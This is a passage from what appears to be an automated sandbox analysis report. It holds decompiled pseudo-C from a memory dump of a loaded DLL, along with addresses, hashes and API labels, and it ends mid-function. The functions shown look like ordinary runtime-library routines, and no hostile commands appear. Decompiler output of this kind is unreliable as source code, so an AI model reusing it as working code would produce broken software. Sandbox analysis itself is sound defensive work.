                                                                      				_t287 =  &(_t252[1]);
                                                                      				if (_t287 - _t295 >= 0) goto 0x800586d9;
                                                                      				if ( *_t287 != r11w) goto 0x800586d9;
                                                                      				r8d = 4;
                                                                      				goto 0x800586df;
                                                                      				r8d = 2;
                                                                      				 *_t297 = r11w & 0xffffffff;
                                                                      				if (_t252 + _t287 - _t295 < 0) goto 0x800586af;
                                                                      				goto 0x800586fe;
                                                                      				_t254 =  *((intOrPtr*)(0x80071840 + _t272 * 8));
                                                                      				 *(_t254 + 0x38 + _t300 * 8) =  *(_t254 + 0x38 + _t300 * 8) | 0x00000002;
                                                                      				goto 0x800585e4;
                                                                      				E00000001180057C78(_t151, r12d, _t197, _v72,  &(_t297[1]));
                                                                      				goto 0x80058684;
                                                                      				if (GetLastError() != 5) goto 0x80058743;
                                                                      				E00000001180013B18(_t254);
                                                                      				 *_t254 = 9;
                                                                      				_t155 = E00000001180013AF8(_t254);
                                                                      				 *_t254 = 5;
                                                                      				goto 0x800585e1;
                                                                      				if (_t155 != 0x6d) goto 0x800585da;
                                                                      				goto 0x800585e4;
                                                                      				goto 0x80058772;
                                                                      				E00000001180013AF8(_t254);
                                                                      				 *_t254 =  *_t254 & 0x00000000;
                                                                      				E00000001180013B18(_t254);
                                                                      				 *_t254 = 9;
                                                                      				return E00000001180013928() | 0xffffffff;
                                                                      			}













































                                                                      0x180058338
                                                                      0x180058338
                                                                      0x180058352
                                                                      0x180058359
                                                                      0x18005835b
                                                                      0x180058360
                                                                      0x180058363
                                                                      0x180058368
                                                                      0x18005836e
                                                                      0x180058375
                                                                      0x18005837b
                                                                      0x180058382
                                                                      0x180058395
                                                                      0x18005839e
                                                                      0x1800583a3
                                                                      0x1800583a7
                                                                      0x1800583ac
                                                                      0x1800583b0
                                                                      0x1800583bc
                                                                      0x1800583c9
                                                                      0x1800583cb
                                                                      0x1800583d0
                                                                      0x1800583d3
                                                                      0x1800583d8
                                                                      0x1800583de
                                                                      0x1800583e6
                                                                      0x1800583ee
                                                                      0x1800583f4
                                                                      0x1800583f7
                                                                      0x1800583f9
                                                                      0x180058401
                                                                      0x180058409
                                                                      0x18005840e
                                                                      0x180058416
                                                                      0x180058416
                                                                      0x18005841d
                                                                      0x180058422
                                                                      0x18005842c
                                                                      0x18005842e
                                                                      0x180058433
                                                                      0x180058435
                                                                      0x18005843a
                                                                      0x180058440
                                                                      0x180058445
                                                                      0x180058450
                                                                      0x18005845a
                                                                      0x180058464
                                                                      0x18005846a
                                                                      0x180058471
                                                                      0x180058474
                                                                      0x18005847b
                                                                      0x180058480
                                                                      0x180058486
                                                                      0x180058488
                                                                      0x18005848d
                                                                      0x180058493
                                                                      0x180058498
                                                                      0x18005849e
                                                                      0x1800584a8
                                                                      0x1800584a8
                                                                      0x1800584ac
                                                                      0x1800584b1
                                                                      0x1800584b6
                                                                      0x1800584bc
                                                                      0x1800584c8
                                                                      0x1800584cd
                                                                      0x1800584d3
                                                                      0x1800584de
                                                                      0x1800584e2
                                                                      0x1800584e8
                                                                      0x1800584f0
                                                                      0x1800584f4
                                                                      0x1800584f6
                                                                      0x180058504
                                                                      0x180058507
                                                                      0x18005850c
                                                                      0x180058514
                                                                      0x18005851a
                                                                      0x180058522
                                                                      0x180058526
                                                                      0x180058528
                                                                      0x180058533
                                                                      0x180058536
                                                                      0x180058538
                                                                      0x180058540
                                                                      0x180058546
                                                                      0x18005854e
                                                                      0x180058552
                                                                      0x180058554
                                                                      0x180058564
                                                                      0x180058573
                                                                      0x180058585
                                                                      0x18005858f
                                                                      0x1800585a3
                                                                      0x1800585ad
                                                                      0x1800585bc
                                                                      0x1800585c5
                                                                      0x1800585c7
                                                                      0x1800585d2
                                                                      0x1800585dc
                                                                      0x1800585e7
                                                                      0x1800585ee
                                                                      0x1800585fd
                                                                      0x1800585ff
                                                                      0x180058611
                                                                      0x180058617
                                                                      0x180058625
                                                                      0x180058633
                                                                      0x180058657
                                                                      0x180058661
                                                                      0x180058664
                                                                      0x180058674
                                                                      0x18005867a
                                                                      0x18005867f
                                                                      0x180058686
                                                                      0x180058693
                                                                      0x180058695
                                                                      0x18005869a
                                                                      0x1800586a0
                                                                      0x1800586a7
                                                                      0x1800586a9
                                                                      0x1800586af
                                                                      0x1800586b6
                                                                      0x1800586bc
                                                                      0x1800586be
                                                                      0x1800586c5
                                                                      0x1800586cb
                                                                      0x1800586d1
                                                                      0x1800586d7
                                                                      0x1800586d9
                                                                      0x1800586e2
                                                                      0x1800586ef
                                                                      0x1800586f1
                                                                      0x1800586f3
                                                                      0x1800586f8
                                                                      0x180058706
                                                                      0x180058713
                                                                      0x180058718
                                                                      0x180058726
                                                                      0x180058728
                                                                      0x18005872d
                                                                      0x180058733
                                                                      0x180058738
                                                                      0x18005873e
                                                                      0x180058746
                                                                      0x18005874e
                                                                      0x180058755
                                                                      0x180058757
                                                                      0x18005875c
                                                                      0x18005875f
                                                                      0x180058764
                                                                      0x180058781

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: f7b281e7880efbc9fbc0fd386ef7b3360c19bad19889c74de4309e980d3a8b13
                                                                      • Instruction ID: 2814f3e28117e054f9dff1cb60eb4dcec00e43b7b035d8d5da3b39219df05ba9
                                                                      • Opcode Fuzzy Hash: f7b281e7880efbc9fbc0fd386ef7b3360c19bad19889c74de4309e980d3a8b13
                                                                      • Instruction Fuzzy Hash: 47C1F272208A8D9AE7E39B1594413EE6BA0FB48BC0F458101FE6A277D1DF7AC65CD701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118004E6F0(intOrPtr* __rcx, signed int __rdx, signed int __r9, signed int __r11, long long __r13, long long __r14, long long __r15) {
                                                                      				void* __rbx;
                                                                      				void* __rsi;
                                                                      				intOrPtr _t105;
                                                                      				intOrPtr _t106;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t114;
                                                                      				intOrPtr _t116;
                                                                      				intOrPtr _t117;
                                                                      				intOrPtr _t118;
                                                                      				intOrPtr _t127;
                                                                      				intOrPtr _t135;
                                                                      				signed long long _t170;
                                                                      				signed long long _t171;
                                                                      				void* _t172;
                                                                      				signed long long _t173;
                                                                      				intOrPtr* _t175;
                                                                      				signed long long _t177;
                                                                      				signed long long _t181;
                                                                      				signed long long _t188;
                                                                      				void* _t190;
                                                                      				signed long long _t193;
                                                                      				void* _t195;
                                                                      				void* _t196;
                                                                      				signed long long _t197;
                                                                      				long long _t210;
                                                                      				signed long long _t214;
                                                                      				long long _t223;
                                                                      
                                                                      				_t195 = _t196 - 0x2f0;
                                                                      				_t197 = _t196 - 0x3f0;
                                                                      				_t170 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t171 = _t170 ^ _t197;
                                                                      				 *(_t195 + 0x2d0) = _t171;
                                                                      				r12d =  *__rdx;
                                                                      				if (r12d - 1 > 0) goto 0x8004e7e4;
                                                                      				if ( *((intOrPtr*)(__rdx + 4)) != 0) goto 0x8004e757;
                                                                      				r9d = 0;
                                                                      				 *__rcx = r9d;
                                                                      				_t175 = __rcx + 4;
                                                                      				 *((intOrPtr*)(_t195 + 0x100)) = r9d;
                                                                      				E0000000118005053C(_t171, _t172, _t175, __rdx, __rcx, _t195 + 0x104, __r9);
                                                                      				goto 0x8004ea7e;
                                                                      				if (1 == 1) goto 0x8004e750;
                                                                      				r11d =  *_t175;
                                                                      				if (r11d == 0) goto 0x8004e750;
                                                                      				r9d = 0;
                                                                      				_t173 = _t175 + 4;
                                                                      				r8d = r9d;
                                                                      				r10d = r9d;
                                                                      				_t193 = _t171;
                                                                      				r10d = r10d + 1;
                                                                      				_t188 = __rdx * _t193 + _t171;
                                                                      				if (r10d != r11d) goto 0x8004e780;
                                                                      				if (r8d == 0) goto 0x8004e750;
                                                                      				if ( *__rcx - 0x73 >= 0) goto 0x8004e7bf;
                                                                      				 *((intOrPtr*)(__rcx + 4 + _t171 * 4)) = r8d;
                                                                      				 *__rcx =  *__rcx + 1;
                                                                      				goto 0x8004ea7e;
                                                                      				 *((intOrPtr*)(_t195 + 0x100)) = r9d;
                                                                      				 *__rcx = r9d;
                                                                      				_t177 = _t173;
                                                                      				E0000000118005053C(_t171, _t173, _t177, _t188, __rcx, _t195 + 0x104, __r9);
                                                                      				goto 0x8004ea7e;
                                                                      				_t116 =  *_t177;
                                                                      				 *((long long*)(_t197 + 0x430)) = __r13;
                                                                      				if (_t116 - 1 > 0) goto 0x8004e8cc;
                                                                      				_t113 =  *((intOrPtr*)(__rcx + 4));
                                                                      				 *__rcx = r12d;
                                                                      				r9d =  *_t188;
                                                                      				_t219 = __r9 << 2;
                                                                      				E0000000118005053C(_t171, _t173, __rcx + 4, _t188, __rcx, _t188 + 4, __r9 << 2);
                                                                      				if (_t113 != 0) goto 0x8004e843;
                                                                      				r9d = 0;
                                                                      				 *((intOrPtr*)(_t195 + 0x100)) = r9d;
                                                                      				 *__rcx = r9d;
                                                                      				E0000000118005053C(_t171, _t173, __rcx + 4, _t188, __rcx, _t195 + 0x104, __r9 << 2);
                                                                      				goto 0x8004ea76;
                                                                      				if (_t113 == 1) goto 0x8004e83c;
                                                                      				r11d =  *__rcx;
                                                                      				if (r11d == 0) goto 0x8004e83c;
                                                                      				r9d = 0;
                                                                      				r8d = r9d;
                                                                      				r10d = r9d;
                                                                      				r10d = r10d + 1;
                                                                      				_t190 = _t188 * _t173 + _t171;
                                                                      				if (r10d != r11d) goto 0x8004e860;
                                                                      				if (r8d == 0) goto 0x8004e83c;
                                                                      				if ( *__rcx - 0x73 >= 0) goto 0x8004e8a6;
                                                                      				 *((intOrPtr*)(__rcx + 4 + _t171 * 4)) = r8d;
                                                                      				 *__rcx =  *__rcx + 1;
                                                                      				goto 0x8004ea76;
                                                                      				 *((intOrPtr*)(_t195 + 0x100)) = r9d;
                                                                      				 *__rcx = r9d;
                                                                      				_t181 = __rcx + 4;
                                                                      				E0000000118005053C(_t171, _t173, _t181, _t190, __rcx, _t195 + 0x104, _t219);
                                                                      				goto 0x8004ea76;
                                                                      				 *((long long*)(_t197 + 0x3e8)) = __r14;
                                                                      				 *((long long*)(_t197 + 0x3e0)) = __r15;
                                                                      				_t222 =  >=  ? __rcx : _t190;
                                                                      				_t223 = ( >=  ? __rcx : _t190) + 4;
                                                                      				 *((long long*)(_t197 + 0x28)) = _t223;
                                                                      				_t209 =  >=  ? _t190 : __rcx;
                                                                      				r9d = 0;
                                                                      				_t210 = ( >=  ? _t190 : __rcx) + 4;
                                                                      				_t114 = r9d;
                                                                      				 *((long long*)(_t197 + 0x20)) = _t210;
                                                                      				if (r12d - _t116 >= 0) goto 0x8004e912;
                                                                      				r15d = _t116;
                                                                      				goto 0x8004e918;
                                                                      				r15d = r12d;
                                                                      				r12d = _t116;
                                                                      				_t117 = r9d;
                                                                      				 *((intOrPtr*)(_t195 + 0x100)) = _t117;
                                                                      				r14d =  *((intOrPtr*)(_t223 + _t171 * 4));
                                                                      				if (r14d != 0) goto 0x8004e94a;
                                                                      				if (_t114 != _t117) goto 0x8004ea19;
                                                                      				_t41 = _t173 + 1; // 0x1
                                                                      				_t118 = _t41;
                                                                      				 *((intOrPtr*)(_t195 + 0x104 + _t171 * 4)) = r9d;
                                                                      				 *((intOrPtr*)(_t195 + 0x100)) = _t118;
                                                                      				goto 0x8004ea19;
                                                                      				r10d = r9d;
                                                                      				_t105 = _t114;
                                                                      				if (r15d == 0) goto 0x8004ea0a;
                                                                      				if (_t105 == 0x73) goto 0x8004e9bf;
                                                                      				r11d = _t105;
                                                                      				if (_t105 != _t118) goto 0x8004e97d;
                                                                      				_t46 = _t171 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t195 + 0x104 + __r11 * 4)) = r9d;
                                                                      				 *((intOrPtr*)(_t195 + 0x100)) = _t46;
                                                                      				_t106 = _t105 + 1;
                                                                      				r8d =  *((intOrPtr*)(_t210 + _t181 * 4));
                                                                      				 *((intOrPtr*)(_t195 + 0x104 + __r11 * 4)) = r8d;
                                                                      				if (_t193 + _t171 == r15d) goto 0x8004e9bf;
                                                                      				_t214 =  *((intOrPtr*)(_t197 + 0x20));
                                                                      				goto 0x8004e960;
                                                                      				if (r10d == 0) goto 0x8004ea0a;
                                                                      				if (_t106 == 0x73) goto 0x8004ea46;
                                                                      				r8d = _t106;
                                                                      				if (_t106 !=  *((intOrPtr*)(_t195 + 0x100))) goto 0x8004e9e1;
                                                                      				_t63 = _t171 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t195 + 0x104 + _t214 * 4)) = r9d;
                                                                      				 *((intOrPtr*)(_t195 + 0x100)) = _t63;
                                                                      				_t135 =  *((intOrPtr*)(_t195 + 0x104 + _t214 * 4));
                                                                      				 *((intOrPtr*)(_t195 + 0x104 + _t214 * 4)) = _t135;
                                                                      				_t127 =  *((intOrPtr*)(_t195 + 0x100));
                                                                      				r10d = _t135;
                                                                      				if (_t135 != 0) goto 0x8004e9c4;
                                                                      				if (_t106 + 1 == 0x73) goto 0x8004ea46;
                                                                      				if (_t114 + 1 != r12d) goto 0x8004e921;
                                                                      				r9d = _t127;
                                                                      				 *__rcx = _t127;
                                                                      				E0000000118005053C(_t171, _t173, __rcx + 4, _t190 + _t181 >> 0x20, __rcx, _t195 + 0x104, _t219 << 2);
                                                                      				goto 0x8004ea66;
                                                                      				 *((intOrPtr*)(_t197 + 0x30)) = r9d;
                                                                      				 *__rcx = r9d;
                                                                      				r9d = 0;
                                                                      				E0000000118005053C(_t171, _t173, __rcx + 4, _t190 + _t181 >> 0x20, __rcx, _t197 + 0x34, _t219 << 2);
                                                                      				return E000000011800028F0(0, _t127,  *(_t195 + 0x2d0) ^ _t197);
                                                                      			}






























                                                                      0x18004e6f7
                                                                      0x18004e6ff
                                                                      0x18004e706
                                                                      0x18004e70d
                                                                      0x18004e710
                                                                      0x18004e717
                                                                      0x18004e721
                                                                      0x18004e72c
                                                                      0x18004e72e
                                                                      0x18004e738
                                                                      0x18004e740
                                                                      0x18004e744
                                                                      0x18004e74b
                                                                      0x18004e752
                                                                      0x18004e75a
                                                                      0x18004e75c
                                                                      0x18004e762
                                                                      0x18004e764
                                                                      0x18004e767
                                                                      0x18004e76b
                                                                      0x18004e76e
                                                                      0x18004e771
                                                                      0x18004e783
                                                                      0x18004e794
                                                                      0x18004e7a3
                                                                      0x18004e7a8
                                                                      0x18004e7af
                                                                      0x18004e7b1
                                                                      0x18004e7b8
                                                                      0x18004e7ba
                                                                      0x18004e7c6
                                                                      0x18004e7d2
                                                                      0x18004e7d5
                                                                      0x18004e7d8
                                                                      0x18004e7df
                                                                      0x18004e7e4
                                                                      0x18004e7e6
                                                                      0x18004e7f1
                                                                      0x18004e7f7
                                                                      0x18004e7fe
                                                                      0x18004e805
                                                                      0x18004e80d
                                                                      0x18004e811
                                                                      0x18004e818
                                                                      0x18004e81a
                                                                      0x18004e829
                                                                      0x18004e834
                                                                      0x18004e837
                                                                      0x18004e83e
                                                                      0x18004e846
                                                                      0x18004e848
                                                                      0x18004e84e
                                                                      0x18004e850
                                                                      0x18004e853
                                                                      0x18004e856
                                                                      0x18004e863
                                                                      0x18004e879
                                                                      0x18004e88a
                                                                      0x18004e88f
                                                                      0x18004e896
                                                                      0x18004e898
                                                                      0x18004e89f
                                                                      0x18004e8a1
                                                                      0x18004e8ad
                                                                      0x18004e8b9
                                                                      0x18004e8bc
                                                                      0x18004e8c0
                                                                      0x18004e8c7
                                                                      0x18004e8cf
                                                                      0x18004e8da
                                                                      0x18004e8e2
                                                                      0x18004e8e9
                                                                      0x18004e8f0
                                                                      0x18004e8f5
                                                                      0x18004e8f9
                                                                      0x18004e8fc
                                                                      0x18004e900
                                                                      0x18004e903
                                                                      0x18004e90b
                                                                      0x18004e90d
                                                                      0x18004e910
                                                                      0x18004e912
                                                                      0x18004e915
                                                                      0x18004e918
                                                                      0x18004e91b
                                                                      0x18004e923
                                                                      0x18004e92a
                                                                      0x18004e92e
                                                                      0x18004e934
                                                                      0x18004e934
                                                                      0x18004e937
                                                                      0x18004e93f
                                                                      0x18004e945
                                                                      0x18004e94a
                                                                      0x18004e94d
                                                                      0x18004e952
                                                                      0x18004e963
                                                                      0x18004e965
                                                                      0x18004e96a
                                                                      0x18004e96c
                                                                      0x18004e96f
                                                                      0x18004e977
                                                                      0x18004e980
                                                                      0x18004e982
                                                                      0x18004e9a1
                                                                      0x18004e9b6
                                                                      0x18004e9b8
                                                                      0x18004e9bd
                                                                      0x18004e9c2
                                                                      0x18004e9c7
                                                                      0x18004e9c9
                                                                      0x18004e9ce
                                                                      0x18004e9d0
                                                                      0x18004e9d3
                                                                      0x18004e9db
                                                                      0x18004e9e1
                                                                      0x18004e9f1
                                                                      0x18004e9f9
                                                                      0x18004ea03
                                                                      0x18004ea08
                                                                      0x18004ea0d
                                                                      0x18004ea1e
                                                                      0x18004ea24
                                                                      0x18004ea2e
                                                                      0x18004ea3d
                                                                      0x18004ea44
                                                                      0x18004ea46
                                                                      0x18004ea4f
                                                                      0x18004ea57
                                                                      0x18004ea5f
                                                                      0x18004ea9a

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1502251526-0
                                                                      • Opcode ID: 98581697d9dbc3ccfd341ce1534d6375d9dc70796eb9a9659f2b8d15fbf82958
                                                                      • Instruction ID: fddd27b8f21620164de3f17fff90ea0c09261d0a41a060eeefedbaed3ab019b1
                                                                      • Opcode Fuzzy Hash: 98581697d9dbc3ccfd341ce1534d6375d9dc70796eb9a9659f2b8d15fbf82958
                                                                      • Instruction Fuzzy Hash: 1CA1D472604AC48BE7BA8F54E480BD977A0F36A7CCF51D115EB4A57B84DB34DA88CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E0000000118004BE04(void* __ecx, void* __edx, long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, signed int __r9, void* __r10) {
                                                                      				intOrPtr _t37;
                                                                      				intOrPtr _t49;
                                                                      				void* _t50;
                                                                      				void* _t87;
                                                                      				intOrPtr* _t88;
                                                                      				intOrPtr* _t90;
                                                                      				intOrPtr* _t93;
                                                                      				intOrPtr* _t114;
                                                                      				intOrPtr* _t118;
                                                                      				long long _t121;
                                                                      				void* _t122;
                                                                      				void* _t124;
                                                                      				signed long long _t137;
                                                                      				void* _t138;
                                                                      				void* _t140;
                                                                      				int _t142;
                                                                      				intOrPtr* _t143;
                                                                      				void* _t145;
                                                                      				intOrPtr* _t146;
                                                                      
                                                                      				_t110 = __rdx;
                                                                      				_t50 = __ecx;
                                                                      				_t87 = _t124;
                                                                      				 *((long long*)(_t87 + 8)) = __rbx;
                                                                      				 *((long long*)(_t87 + 0x10)) = _t121;
                                                                      				 *((long long*)(_t87 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t87 + 0x20)) = __rdi;
                                                                      				_t122 = __r8;
                                                                      				_t143 = __rdx;
                                                                      				_t114 = __rcx;
                                                                      				E0000000118003CFF0(_t87, __rbx, __rdx, __rsi, _t145);
                                                                      				r12d = 0;
                                                                      				_t5 = _t87 + 0x98; // 0x98
                                                                      				_t93 = _t5;
                                                                      				_t88 = _t114 + 0x80;
                                                                      				 *((intOrPtr*)(_t93 + 0x10)) = r12d;
                                                                      				_t8 = _t93 + 0x258; // 0x2f0
                                                                      				_t146 = _t8;
                                                                      				 *_t93 = _t114;
                                                                      				_t9 = _t93 + 8; // 0xa0
                                                                      				_t118 = _t9;
                                                                      				 *_t146 = r12w;
                                                                      				 *_t118 = _t88;
                                                                      				if ( *_t88 == r12w) goto 0x8004be79;
                                                                      				_t10 = _t140 + 0x16; // 0x16
                                                                      				E0000000118004BD68(_t10, _t93, 0x80061ff0, _t114, _t118, _t118);
                                                                      				if ( *((intOrPtr*)( *_t93)) == r12w) goto 0x8004becf;
                                                                      				if ( *((intOrPtr*)( *_t118)) == r12w) goto 0x8004be92;
                                                                      				E0000000118004B650(_t93, _t93, _t118, __r9);
                                                                      				goto 0x8004be97;
                                                                      				E0000000118004B720(_t93, _t93, _t118, __r9);
                                                                      				if ( *((intOrPtr*)(_t93 + 0x10)) != r12d) goto 0x8004bede;
                                                                      				if (E0000000118004BD68(0x40, _t93, 0x80061bd0, _t114, _t118, _t93) == 0) goto 0x8004bed4;
                                                                      				_t90 =  *_t118;
                                                                      				if ( *_t90 == r12w) goto 0x8004bec8;
                                                                      				E0000000118004B650(_t93, _t93, _t93, __r9);
                                                                      				goto 0x8004bed4;
                                                                      				E0000000118004B720(_t93, _t93, _t93, __r9);
                                                                      				goto 0x8004bed4;
                                                                      				E0000000118004B5A8(_t50,  *_t90 - r12w, _t93, _t93, _t110, _t118, _t93, __r9, __r10);
                                                                      				if ( *((intOrPtr*)(_t93 + 0x10)) == r12d) goto 0x8004c031;
                                                                      				if ( *_t114 != r12w) goto 0x8004bef9;
                                                                      				if ( *((intOrPtr*)(_t114 + 0x100)) != r12w) goto 0x8004bef9;
                                                                      				GetACP();
                                                                      				goto 0x8004bf01;
                                                                      				_t37 = E0000000118004BBC0(_t50, _t93, _t114 + 0x100, _t93, _t118, __r8, __r9, __r10);
                                                                      				_t49 = _t37;
                                                                      				if (_t37 == 0) goto 0x8004c031;
                                                                      				if (_t37 == 0xfde8) goto 0x8004c031;
                                                                      				if (IsValidCodePage(_t142) == 0) goto 0x8004c031;
                                                                      				if (_t143 == 0) goto 0x8004bf2f;
                                                                      				 *_t143 = _t49;
                                                                      				if (_t122 == 0) goto 0x8004c02a;
                                                                      				_t119 = _t122 + 0x120;
                                                                      				 *((intOrPtr*)(_t122 + 0x120)) = r12w;
                                                                      				_t137 = (__r9 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)(_t146 + _t137 * 2)) != r12w) goto 0x8004bf47;
                                                                      				_t138 = _t137 + 1;
                                                                      				if (E0000000118004B224(_t90, _t93, _t122 + 0x120, _t93, _t122 + 0x120, _t146, _t138, _t140) != 0) goto 0x8004c052;
                                                                      				_t17 = _t90 + 0x40; // 0x40
                                                                      				r9d = _t17;
                                                                      				if (E000000011800475F0(0x1001, E0000000118004B224(_t90, _t93, _t122 + 0x120, _t93, _t122 + 0x120, _t146, _t138, _t140), _t90, _t93, _t122 + 0x120, _t122 + 0x120, _t122, _t122) == 0) goto 0x8004c031;
                                                                      				r9d = 0x40;
                                                                      				if (E000000011800475F0(0x1002, E000000011800475F0(0x1001, E0000000118004B224(_t90, _t93, _t122 + 0x120, _t93, _t122 + 0x120, _t146, _t138, _t140), _t90, _t93, _t122 + 0x120, _t122 + 0x120, _t122, _t122), _t90, _t93, _t119, _t119, _t122, _t122 + 0x80) == 0) goto 0x8004c031;
                                                                      				E0000000118005B9F4(0x5f, _t122 + 0x80, _t138);
                                                                      				if (_t90 != 0) goto 0x8004bfcf;
                                                                      				_t19 = _t90 + 0x2e; // 0x2e
                                                                      				E0000000118005B9F4(_t19, _t122 + 0x80, _t138);
                                                                      				if (_t90 == 0) goto 0x8004bfe8;
                                                                      				r9d = 0x40;
                                                                      				_t20 = _t138 - 0x39; // 0x7
                                                                      				if (E000000011800475F0(_t20, _t90, _t90, _t93, _t119, _t119, _t122, _t122 + 0x80) == 0) goto 0x8004c031;
                                                                      				if (_t49 != 0xfde9) goto 0x8004c016;
                                                                      				r9d = 5;
                                                                      				if (E0000000118004B224(_t122 + 0x100, _t93, _t122 + 0x100, _t93, _t119, L"utf8", _t138) != 0) goto 0x8004c052;
                                                                      				goto 0x8004c02a;
                                                                      				r9d = 0xa;
                                                                      				_t23 = _t138 + 6; // 0x46
                                                                      				r8d = _t23;
                                                                      				E000000011800550DC(_t49);
                                                                      				goto 0x8004c033;
                                                                      				return 0;
                                                                      			}






















                                                                      0x18004be04
                                                                      0x18004be04
                                                                      0x18004be04
                                                                      0x18004be07
                                                                      0x18004be0b
                                                                      0x18004be0f
                                                                      0x18004be13
                                                                      0x18004be21
                                                                      0x18004be24
                                                                      0x18004be27
                                                                      0x18004be2a
                                                                      0x18004be2f
                                                                      0x18004be35
                                                                      0x18004be35
                                                                      0x18004be3c
                                                                      0x18004be43
                                                                      0x18004be47
                                                                      0x18004be47
                                                                      0x18004be4e
                                                                      0x18004be51
                                                                      0x18004be51
                                                                      0x18004be55
                                                                      0x18004be59
                                                                      0x18004be60
                                                                      0x18004be65
                                                                      0x18004be71
                                                                      0x18004be80
                                                                      0x18004be89
                                                                      0x18004be8b
                                                                      0x18004be90
                                                                      0x18004be92
                                                                      0x18004be9b
                                                                      0x18004beb3
                                                                      0x18004beb5
                                                                      0x18004bebf
                                                                      0x18004bec1
                                                                      0x18004bec6
                                                                      0x18004bec8
                                                                      0x18004becd
                                                                      0x18004becf
                                                                      0x18004bed8
                                                                      0x18004bee9
                                                                      0x18004beef
                                                                      0x18004bef1
                                                                      0x18004bef7
                                                                      0x18004befc
                                                                      0x18004bf01
                                                                      0x18004bf05
                                                                      0x18004bf10
                                                                      0x18004bf21
                                                                      0x18004bf2a
                                                                      0x18004bf2c
                                                                      0x18004bf32
                                                                      0x18004bf38
                                                                      0x18004bf43
                                                                      0x18004bf47
                                                                      0x18004bf4f
                                                                      0x18004bf51
                                                                      0x18004bf66
                                                                      0x18004bf6c
                                                                      0x18004bf6c
                                                                      0x18004bf82
                                                                      0x18004bf8f
                                                                      0x18004bfa7
                                                                      0x18004bfb5
                                                                      0x18004bfbd
                                                                      0x18004bfbf
                                                                      0x18004bfc5
                                                                      0x18004bfcd
                                                                      0x18004bfcf
                                                                      0x18004bfdb
                                                                      0x18004bfe6
                                                                      0x18004bff5
                                                                      0x18004bff7
                                                                      0x18004c012
                                                                      0x18004c014
                                                                      0x18004c016
                                                                      0x18004c021
                                                                      0x18004c021
                                                                      0x18004c025
                                                                      0x18004c02f
                                                                      0x18004c051

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                                      • String ID: utf8
                                                                      • API String ID: 1791977518-905460609
                                                                      • Opcode ID: 71b2bc7a00a7764a766ba7da871295afa98004e3a21c0071ac621d8458af2f7d
                                                                      • Instruction ID: b76846a92058132c6240409fddb609743b00eda77ac674a3dbeb858922c74147
                                                                      • Opcode Fuzzy Hash: 71b2bc7a00a7764a766ba7da871295afa98004e3a21c0071ac621d8458af2f7d
                                                                      • Instruction Fuzzy Hash: 6391A032200B4885EBE69F22D4917E923A5E78CBC8F46C121FF4887796DF79C659C705
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 56%
                                                                      			E0000000118004C908(void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9, void* __r10) {
                                                                      				signed int _v72;
                                                                      				int _v80;
                                                                      				int _v84;
                                                                      				signed int _v88;
                                                                      				void* __rbx;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				int _t60;
                                                                      				intOrPtr _t61;
                                                                      				void* _t73;
                                                                      				intOrPtr _t82;
                                                                      				intOrPtr _t84;
                                                                      				void* _t90;
